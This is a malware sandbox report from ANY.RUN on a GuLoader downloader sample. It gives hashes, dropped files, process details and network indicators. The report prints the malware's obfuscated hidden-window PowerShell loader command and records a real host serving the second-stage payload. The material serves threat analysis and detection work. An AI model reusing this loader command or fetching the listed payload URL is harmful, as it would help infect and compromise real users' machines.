File name:

900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398

Full analysis: https://app.any.run/tasks/19367816-2df2-4695-86fb-d1c751a429b4
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Malware Trends Tracker     >>>
Analysis date: December 04, 2024, 14:56:07
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:

DB4FB8E7AD15FB8AFF39F1FD3274840C

SHA1:

C995F46A60B8B87D420DDAFD9524498A835105F5

SHA256:

900DA53F8F93633B3327162836A260D6F65BD97FC2A0C20CE5AF568FD644F398

SSDEEP:

24576:Pqyhk6tdkJM+OnS38bPI+HYlZszku5ijcsIL7etXolrFghSOqaFi2q:Pqyhk6tdkJM+OnSIPI+HYlZszkUijcsu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 420)

    • GULOADER has been detected

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)

    • GULOADER has been detected (YARA)

      • powershell.exe (PID: 420)
      • Fortyndende.exe (PID: 4308)

    • GULOADER SHELLCODE has been detected (YARA)

      • powershell.exe (PID: 420)
      • Fortyndende.exe (PID: 4308)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 420)

  • INFO

    • Checks supported languages

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)

    • Creates files or folders in the user directory

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)

    • Reads the computer name

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)

    • The executable file from the user directory is run by the Powershell process

      • Fortyndende.exe (PID: 4308)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2016:07:25 00:55:31+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 25088
InitializedDataSize: 3805696
UninitializedDataSize: 2048
EntryPoint: 0x327d
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
122
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #GULOADER 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe no specs #GULOADER powershell.exe conhost.exe no specs #GULOADER fortyndende.exe

Process information

PID
CMD
Path
Indicators
Parent process
420powershell.exe -windowstyle hidden "$Intensives=Get-Content -raw 'C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\Caucuses.Gan16';$Barbituric=$Intensives.SubString(72990,3);.$Barbituric($Intensives) "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
936\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4308"C:\Users\admin\AppData\Local\Temp\Fortyndende.exe"C:\Users\admin\AppData\Local\Temp\Fortyndende.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\users\admin\appdata\local\temp\fortyndende.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
4504"C:\Users\admin\Desktop\900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe" C:\Users\admin\Desktop\900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
4294967295
Modules
Images
c:\users\admin\desktop\900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Total events
5 626
Read events
5 626
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
6
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
4504900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exeC:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\menthadiene.cobbinary
MD5:32D15CF115A883849E7D68D20E260018
SHA256:F02C72537DC221266B71FFAB59AE5597EA1E082E55DC666E16837739F2DD2C7C
4504900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exeC:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\Caucuses.Gan16text
MD5:3C66F76F25B31F2CA93B2B8864F82E4B
SHA256:B9FDB0D31C169B0059E86D35B606AAF555F9A4DFE6D6FAC4D562DFA5765414A7
4504900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\koleraepidemi.lnkbinary
MD5:90F7D7353FB96AF32B866D022B19454F
SHA256:AB08AE5734F853B7C72F79ECD9493302ABE99E1F4189EB27E2A44485B921B716
420powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sr1bd3yz.jf5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4504900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exeC:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\desexualisation.savbinary
MD5:44B1E89488E4FA8853E0D007FD9F1622
SHA256:439B23D2B0398E078BD644E8B11BE483EE368E8D3A2E83D4F77CDE3765DC0BEE
4504900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exeC:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\Mutts251.txttext
MD5:D020E4D2003E9A1D7FF540A92A3B5871
SHA256:5C8DE863779EDF0E85F9BA3F12C0A0835CAF3AC38D31A5F41214F0EE94690D30
4504900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exeC:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\ansatsstykkers.folbinary
MD5:03117BE064FE3FA41C8EFC3F91C2B4D8
SHA256:858BF99BF9F054C3081ED5986287B2CB0B5BDB3A4C555CA8D352191D08B7084B
4504900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exeC:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Segmentalize.Impbinary
MD5:F289E4AFEA7818510CB1CC15E09BAD1C
SHA256:0260ABF121A9218890B9596E1DA5EF7851EB77B5705E6F0F64F0455D48EA5DCA
420powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3wbel4ff.cv4.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
420powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5dg3leom.d30.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
20
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4308
Fortyndende.exe
GET
50.6.194.42:80
http://crstvda.com/PYQSW82.bin
unknown
unknown
4308
Fortyndende.exe
GET
50.6.194.42:80
http://crstvda.com/PYQSW82.bin
unknown
unknown
4712
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
5736
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
5736
svchost.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
4308
Fortyndende.exe
GET
50.6.194.42:80
http://crstvda.com/PYQSW82.bin
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
unknown
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
5736
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
4
System
192.168.100.255:138
unknown
5736
svchost.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
4712
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
5736
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
unknown
4712
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
unknown
4712
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.124.78.146
unknown
google.com
  • 216.58.212.174
unknown
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
unknown
www.microsoft.com
  • 88.221.169.152
unknown
crstvda.com
  • 50.6.194.42
unknown
self.events.data.microsoft.com
  • 20.189.173.25
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398